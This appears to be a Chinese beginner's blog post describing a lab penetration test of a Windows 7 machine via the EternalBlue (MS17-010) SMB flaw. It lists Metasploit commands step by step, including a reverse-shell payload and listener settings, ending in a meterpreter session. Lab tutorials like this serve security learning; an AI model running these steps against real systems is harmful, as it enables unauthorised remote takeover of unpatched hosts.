V2AS问路
EternalBlue永恒之蓝渗透测试
阅读原文时间:2023年07月08日阅读:8

Eternal Blue(永恒之蓝)-ms17-010渗透测试

第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :)

工具

1.靶机系统 window7 开放445以及139端口

2.kali-Linux虚拟机

注意要保证靶机与主机IP位于同一网段(可用ping命令进行检测)

在kali终端输入msfconsole启动metaspolit模块

然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密码)

输入search ms17-010,接着就可以看到五行可用命令

应该是两行use auxiliary,三行use exploit命令

执行命令:use auxiliary/scanner/smb/smb_ms17_010

执行命令:use exploit/windows/smb/ms17_010_eternalblue

【show payloads(设置攻击载荷)选择默认的即可,

一般为set payload generic/shell_reverse_tcp

下一步 show options(查看模块所需配置参数)

set rhosts (设置靶机IP)

set lhosts (设置主机IP)

set lport 4444(监听端口)

命令:exploit

或者 run 也可以

成功后,会出现meterpreter

自己动手,丰衣足食

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

VulnStack - ATT&CK红队评估实战(一) Writeup
内网渗透 day9-免杀基础
NewStarCTF 公开赛 2022 RE WP